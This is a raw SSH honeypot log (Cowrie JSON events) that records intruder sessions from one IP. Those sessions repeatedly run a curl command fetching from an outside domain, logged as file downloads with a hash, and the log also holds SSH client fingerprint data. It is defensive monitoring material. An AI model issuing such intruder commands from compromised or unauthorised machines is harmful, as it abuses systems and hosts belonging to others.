{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:01.032904Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:01.045702Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:01.046415Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:01.090090Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:01.186704Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:01.235873Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:01.430223Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:01.884917Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:01.919912Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:01.928269Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:01.929175Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:01.930868Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:01.931727Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:02.191278Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:02.339600Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:03.052859Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:03.054578Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:03.061690Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:03.062852Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:03.067435Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:03.068317Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:03.239428Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:03.255327Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:03.260433Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:03.936137Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:03.944831Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:03.985668Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:03.994918Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:04.056871Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:04.060574Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:04.156181Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:04.218365Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:04.224122Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:04.862209Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:04.866229Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:04.922525Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:04.926284Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:04.932034Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:04.934634Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:04.959279Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:05.045881Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:05.121031Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:05.185466Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:06.033341Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:06.048489Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:06.148780Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:06.235329Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:06.337072Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:06.356516Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:06.591378Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:06.638152Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:06.849133Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:07.689047Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:07.768514Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:07.973874Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:08.025120Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:08.071558Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:08.137467Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:08.583297Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:08.672160Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11653,"dst_ip":"1.2.3.4","dst_port":22,"session":"215fe4b53e96","protocol":"ssh","message":"New connection: 212.227.235.229:11653 (1.2.3.4:22) [session: 215fe4b53e96]","sensor":"my-vps","timestamp":"2025-08-31T09:01:08.732029Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11960,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a08127ff406","protocol":"ssh","message":"New connection: 212.227.235.229:11960 (1.2.3.4:22) [session: 6a08127ff406]","sensor":"my-vps","timestamp":"2025-08-31T09:01:08.818531Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T09:01:09.434483Z","src_ip":"212.227.235.229","session":"215fe4b53e96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:09.541091Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:09.544478Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:09.619543Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:09.623514Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:09.626932Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:09.627658Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:09.653396Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T09:01:09.743849Z","src_ip":"212.227.235.229","session":"6a08127ff406"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:09.833614Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:01:09.951609Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T09:01:09.975451Z","src_ip":"212.227.235.229","session":"6a08127ff406"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:11.574815Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:01:11.620351Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:01:11.678939Z","src_ip":"212.227.125.160","session":"9f264c568782"}
